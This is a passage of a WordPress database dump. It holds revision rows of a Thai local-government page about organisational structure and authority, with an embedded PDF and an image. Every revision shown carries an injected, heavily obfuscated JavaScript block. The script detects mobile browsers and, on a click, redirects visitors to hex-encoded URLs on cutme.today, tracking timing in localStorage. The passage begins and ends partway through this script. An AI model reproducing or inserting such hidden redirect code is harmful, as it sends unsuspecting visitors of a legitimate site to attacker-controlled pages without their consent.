g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','โครงสร้างและอำนาจหน้าที่','','inherit','closed','closed','','546-revision-v1','','','2025-05-23 15:57:35','2025-05-23 08:57:35','',546,'http://pakhaeng.ssk.in.th/?p=1277',0,'revision','',0),
(1278,1,'2025-05-23 15:58:07','2025-05-23 08:58:07','<!-- wp:file {\"id\":1271,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/ปกโครงสร้างและอำนาจหน้าที่.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/ปกโครงสร้างและอำนาจหน้าที่.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ปกโครงสร้างและอำนาจหน้าที่\"></object><a id=\"wp-block-file--media-219adcf6-6d31-4699-a835-46b4fa55c26b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/ปกโครงสร้างและอำนาจหน้าที่.pdf\">ปกโครงสร้างและอำนาจหน้าที่</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/ปกโครงสร้างและอำนาจหน้าที่.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-219adcf6-6d31-4699-a835-46b4fa55c26b\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":589,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/โครงสร้างบุคลากร-1.png\" alt=\"\" class=\"wp-image-589\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','โครงสร้างและอำนาจหน้าที่','','inherit','closed','closed','','546-revision-v1','','','2025-05-23 15:58:07','2025-05-23 08:58:07','',546,'http://pakhaeng.ssk.in.th/?p=1278',0,'revision','',0),
(1279,1,'2025-05-23 15:58:21','2025-05-23 08:58:21','<!-- wp:file {\"id\":1271,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/ปกโครงสร้างและอำนาจหน้าที่.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/ปกโครงสร้างและอำนาจหน้าที่.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ปกโครงสร้างและอำนาจหน้าที่\"></object><a id=\"wp-block-file--media-219adcf6-6d31-4699-a835-46b4fa55c26b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/ปกโครงสร้างและอำนาจหน้าที่.pdf\">ปกโครงสร้างและอำนาจหน้าที่</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/ปกโครงสร้างและอำนาจหน้าที่.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-219adcf6-6d31-4699-a835-46b4fa55c26b\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":589,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/โครงสร้างบุคลากร-1.png\" alt=\"\" class=\"wp-image-589\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return 